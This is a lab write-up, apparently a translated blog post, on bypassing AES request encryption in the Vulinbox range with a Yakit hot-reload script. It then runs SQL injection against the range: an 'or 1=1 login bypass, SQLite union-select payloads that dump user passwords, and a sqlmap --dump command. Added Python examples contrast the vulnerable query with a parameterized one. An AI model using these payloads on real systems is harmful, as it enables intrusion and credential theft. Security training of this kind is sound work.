乌市泽哥 posted on 2024-12-23 00:58:22

Penetration Testing: Analyzing Front-End/Back-End Encryption - SQL Injection under AES Encryption

This is the 9th and final article in the "Advanced Front-End Encryption/Decryption and Signature Verification in Practice" series. The series uses the Vulinbox target range bundled with Yakit; this article shows how to bypass front-end/back-end encryption and perform SQL injection.

Login

https://img2024.cnblogs.com/blog/2855436/202412/2855436-20241222174649522-1108163498.png
Enter a username and password, capture the packet and look at it: it appears to be ordinary AES encryption:
https://img2024.cnblogs.com/blog/2855436/202412/2855436-20241222174651133-1397250929.png
The hot-reload code here is not difficult; the usual encrypt/decrypt functions are enough:
encryptAES = (packet) => {
    body = poc.GetHTTPPacketBody(packet)
    // generate a random key and IV for every request
    key = randstr(16)
    iv = randstr(12)   // note: a 12-byte IV is used here; the standard AES-CBC IV length is 16 bytes (one block)
    // encrypt the body with AES-CBC, then base64-encode the ciphertext
    data = codec.AESCBCEncrypt(key /*type: []byte*/, body, iv /*type: []byte*/)~
    data = codec.EncodeBase64(data)
    // hex-encode the key and IV; they are sent alongside the ciphertext
    hexKey = codec.EncodeToHex(key)
    hexIV = codec.EncodeToHex(iv)
    // build the new JSON body in the format the server expects
    body = f`{"key": "${hexKey}","iv": "${hexIV}","message": "${data}"}`

    return poc.ReplaceBody(packet, body, false)
}

decryptAES = (packet) => {
    body = poc.GetHTTPPacketBody(packet)
    body = json.loads(body)
    // reverse the steps above: hex-decode key/IV, base64-decode the message, then AES-CBC decrypt
    key = codec.DecodeHex(body.key)~
    iv = codec.DecodeHex(body.iv)~
    data = codec.DecodeBase64(body.message)~
    data = codec.AESCBCDecrypt(key, data, iv)~
    return poc.ReplaceBody(packet, data, false)
}

// encrypt every outgoing request, decrypt every incoming response
beforeRequest = func(req){
    return encryptAES(req)
}
afterRequest = func(rsp){
    return decryptAES(rsp)
}

Request body format:

{"username":"admin","password":"password"}

Hot-reload encryption/decryption succeeded:
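As an added example (my own code, not part of the original post and not Yakit's or Vulinbox's), here is the receiving side of the {"key","iv","message"} envelope the hot-reload script produces: a Python parser that decodes the hex and base64 fields and checks their lengths before anything would be handed to an AES-CBC decryptor. The sample envelopes are constructed and their "ciphertext" bytes are placeholders rather than real AES output; the function names are assumptions. It goes one step beyond the page by rejecting the 12-byte IV that the script above generates, since AES-CBC requires a 16-byte IV.

```python
import base64
import binascii
import json

AES_KEY_SIZES = (16, 24, 32)   # AES-128 / AES-192 / AES-256
AES_BLOCK_SIZE = 16            # CBC IV length and ciphertext alignment


class EnvelopeError(ValueError):
    """Raised when the request body is not a well-formed encryption envelope."""


def parse_envelope(body: str) -> dict:
    """Decode a {"key","iv","message"} body into raw bytes, validating every field.

    Returns {"key": bytes, "iv": bytes, "ciphertext": bytes}; raises EnvelopeError
    rather than letting a malformed field reach the cipher.
    """
    try:
        obj = json.loads(body)
    except json.JSONDecodeError as exc:
        raise EnvelopeError(f"body is not JSON: {exc}") from None
    if not isinstance(obj, dict):
        raise EnvelopeError("body is not a JSON object")
    for field in ("key", "iv", "message"):
        if not isinstance(obj.get(field), str):
            raise EnvelopeError(f"missing or non-string field: {field}")
    try:
        key = bytes.fromhex(obj["key"])
        iv = bytes.fromhex(obj["iv"])
    except ValueError:
        raise EnvelopeError("key/iv are not valid hex") from None
    try:
        ciphertext = base64.b64decode(obj["message"], validate=True)
    except (binascii.Error, ValueError):
        raise EnvelopeError("message is not valid base64") from None
    if len(key) not in AES_KEY_SIZES:
        raise EnvelopeError(f"key length {len(key)} is not a valid AES key size")
    if len(iv) != AES_BLOCK_SIZE:
        raise EnvelopeError(f"iv length {len(iv)} is not the 16-byte CBC block size")
    if len(ciphertext) == 0 or len(ciphertext) % AES_BLOCK_SIZE:
        raise EnvelopeError("ciphertext is empty or not a multiple of the block size")
    return {"key": key, "iv": iv, "ciphertext": ciphertext}


def build_envelope(key: bytes, iv: bytes, ciphertext: bytes) -> str:
    """Produce the same JSON layout the hot-reload script emits (hex key/iv, base64 message)."""
    return json.dumps({
        "key": key.hex(),
        "iv": iv.hex(),
        "message": base64.b64encode(ciphertext).decode("ascii"),
    })


def validate_envelope(body: str) -> tuple:
    """Convenience wrapper: (True, "ok") or (False, reason)."""
    try:
        parse_envelope(body)
        return (True, "ok")
    except EnvelopeError as exc:
        return (False, str(exc))


# Constructed samples: the "ciphertext" is placeholder bytes, not real AES output.
SAMPLE_GOOD = build_envelope(b"k" * 16, b"i" * 16, bytes(range(32)))
# Mirrors the script above, which generates a 12-byte IV (randstr(12)).
SAMPLE_SHORT_IV = build_envelope(b"k" * 16, b"i" * 12, bytes(range(32)))

if __name__ == "__main__":
    for name, sample in (("good", SAMPLE_GOOD), ("short-iv", SAMPLE_SHORT_IV), ("junk", "not json")):
        print(name, validate_envelope(sample))
```

Note what this envelope does and does not provide: the key and IV travel in the same JSON object as the ciphertext, so anyone who can read the request can decrypt it, and the back end must treat the decrypted plaintext as ordinary untrusted user input. Validating the envelope only keeps malformed fields away from the cipher; it says nothing about what the plaintext contains.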
https://img2024.cnblogs.com/blog/2855436/202412/2855436-20241222174705787-2068326505.png
The hint for this level is SQL injection, so I went straight for a 1=1, and in no time at all the login succeeded:
POST /crypto/sqli/aes-ecb/encrypt/login HTTP/1.1
Host: 127.0.0.1:8787
Content-Type: application/json

{"username":"admin","password":"password'or 1=1--"}

https://img2024.cnblogs.com/blog/2855436/202412/2855436-20241222174708984-532270764.png

Injection

Manual

After logging in, I saw a request to the path /crypto/sqli/aes-ecb/encrypt/query/users
https://img2024.cnblogs.com/blog/2855436/202412/2855436-20241222174717030-1248920885.png
Decrypt the request packet:
https://img2024.cnblogs.com/blog/2855436/202412/2855436-20241222174720155-1508659664.png
This gives the request format:

{"search":""}

https://img2024.cnblogs.com/blog/2855436/202412/2855436-20241222174723767-2076971252.png
This is SQLite injection; the statements used were taken from this article: sqlite注入的一点总结 ("A few notes on SQLite injection") - 先知社区 (aliyun.com)

{"search":"user1'order by 3--"}
{"search":"user1'union select 1,2,3--"}
{"search":"user1'union select 11,22,sql from sqlite_master--"}
{"search":"user1'union select 11,22,sql from sqlite_master where type='table' and name='vulin_users'--"}
{"search":"user1'union select username,password,id from vulin_users--"}

Injection succeeded:
POST /crypto/sqli/aes-ecb/encrypt/query/users HTTP/1.1
Host: 127.0.0.1:8787
Cookie: token=PLNqoZMZfiELLLFuTbmOtSrDdnpFmDDM
Content-Type: application/json
Content-Length: 119

{"search":"user1'union select username,password,id from vulin_users--"}

https://img2024.cnblogs.com/blog/2855436/202412/2855436-20241222174730943-448657941.png

sqlmap
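The payloads above only work because the decrypted search string is concatenated into the SQL statement; the encryption layer changes nothing about that. As an added example (my own code, not Vulinbox's), the following Python models the back end behind query/users with an in-memory SQLite table: a vulnerable handler that builds the query by string formatting, beside a handler that binds the search string as a parameter. The table layout, the sample rows and the query shape (a LIKE on username returning three columns, matching the three-column payloads above) are assumptions; the {"search": ...} body format and the union payload are the ones from the post.

```python
import json
import sqlite3


# Constructed in-memory stand-in for the lab's vulin_users table.
# Column layout and rows are assumptions; the real schema is not shown in the post.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE vulin_users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO vulin_users (username, password, role) VALUES (?, ?, ?)",
        [("admin", "password", "admin"), ("user1", "s3cret", "user"), ("user2", "hunter2", "user")],
    )
    conn.commit()
    return conn


def search_users_vulnerable(conn: sqlite3.Connection, search: str) -> list:
    # The decrypted search string is pasted straight into the statement.
    # Transport encryption does not help here: the key and IV travel in the
    # same JSON as the ciphertext, so the plaintext is fully attacker-controlled.
    sql = (
        "SELECT username, role, id FROM vulin_users "
        f"WHERE username LIKE '{search}%' ORDER BY id"
    )
    return conn.execute(sql).fetchall()


def search_users_safe(conn: sqlite3.Connection, search: str) -> list:
    # Bound parameter: the search string is data and can never alter the SQL grammar.
    sql = "SELECT username, role, id FROM vulin_users WHERE username LIKE ? ORDER BY id"
    return conn.execute(sql, (search + "%",)).fetchall()


def handle_search_request(conn: sqlite3.Connection, plaintext_body: str, safe: bool) -> list:
    """Model of the query/users endpoint after decryption: the body is {"search": "..."}."""
    search = json.loads(plaintext_body)["search"]
    return search_users_safe(conn, search) if safe else search_users_vulnerable(conn, search)


# The union payload from the manual section of the post.
UNION_PAYLOAD = '{"search":"user1\'union select username,password,id from vulin_users--"}'

if __name__ == "__main__":
    db = make_db()
    # The vulnerable handler returns password values in the "role" column position;
    # the parameterized handler returns no rows, because no username starts with the payload.
    print("vulnerable:    ", handle_search_request(db, UNION_PAYLOAD, safe=False))
    print("parameterized: ", handle_search_request(db, UNION_PAYLOAD, safe=True))
```

The fix is entirely server-side: the parameterized handler accepts exactly the same envelope and the same decrypted body, which is why a client-side encryption layer should never be counted as an injection defense.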

Load the hot-reload code in the MITM module
https://img2024.cnblogs.com/blog/2855436/202412/2855436-20241222174733181-1784897463.png
Run the injection with sqlmap (sqlmap's DBMS option is the double-dash form --dbms):

python .\sqlmap.py -r .\http.txt --proxy=http://127.0.0.1:8081 --batch --dbms=sqlite -T vulin_users -C username,password,role --dump

http.txt:
POST /crypto/sqli/aes-ecb/encrypt/query/users HTTP/1.1
Host: 127.0.0.1:8787
Cookie: token=PLNqoZMZfiELLLFuTbmOtSrDdnpFmDDM
Content-Type: application/json
Content-Length: 119

{"search":"*"}

Result:
https://img2024.cnblogs.com/blog/2855436/202412/2855436-20241222174737032-281899828.png
